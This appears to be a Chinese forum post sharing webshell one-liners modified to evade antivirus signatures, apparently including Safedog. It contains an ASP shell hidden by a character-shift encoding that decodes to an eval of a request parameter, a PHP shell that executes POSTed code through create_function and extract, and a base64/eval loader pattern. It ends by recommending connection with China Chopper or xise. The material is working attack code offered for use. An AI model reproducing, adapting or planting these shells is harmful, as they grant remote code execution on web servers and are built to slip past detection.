发现有些思路很好的webshell已经被特征了
稍微改改就好了
asp过狗一句话↓原马儿
eXecUTe(fun("%167%184%163%174%98%180%167%179%183%167%181%182%106%100%142%163%176%166%137%180%167%187%100%107"))
Function fun(Str):
Str = Split(Str,"%")
For x=1 To Ubound(Str)
fun=fun&Chr(Str(x)-66)
Next
End Function
%>改改
Function ff0f(Str):
Str = Split(Str,"%")
For x=1 To Ubound((((Str))))
ff0f=ff0f&Chr(Str(x)-66)
Next
End Function
eXecUTe(ff0f("%167%184%163%174%98%180%167%179%183%167%181%182%106%100%142%163%176%166%137%180%167%187%100%107"))
%>//密码LandGrey原马儿
function fun2(){
$b=$_POST;
return @($b[pass]);
}
@extract(array(b=>create_function(NULL,fun2())));
@extract(array(c=>$b()));
?>改改<?php
@extract(array(b=>create_function(NulL,fun2())));
@extract(array(c=>$b()));
function fun2(){$b=$_POST;return @($b[pass]);}
?>//密码pass
php大马这个加密法还可以用↓<?php
$l='baSe64';
$o='_dE';
$v='cO';
$e='DE';
$love=$l.$o.$v.$e;
$a=$love('code');
eval(Null.$a=$a);
用菜刀或者xise连接修改更好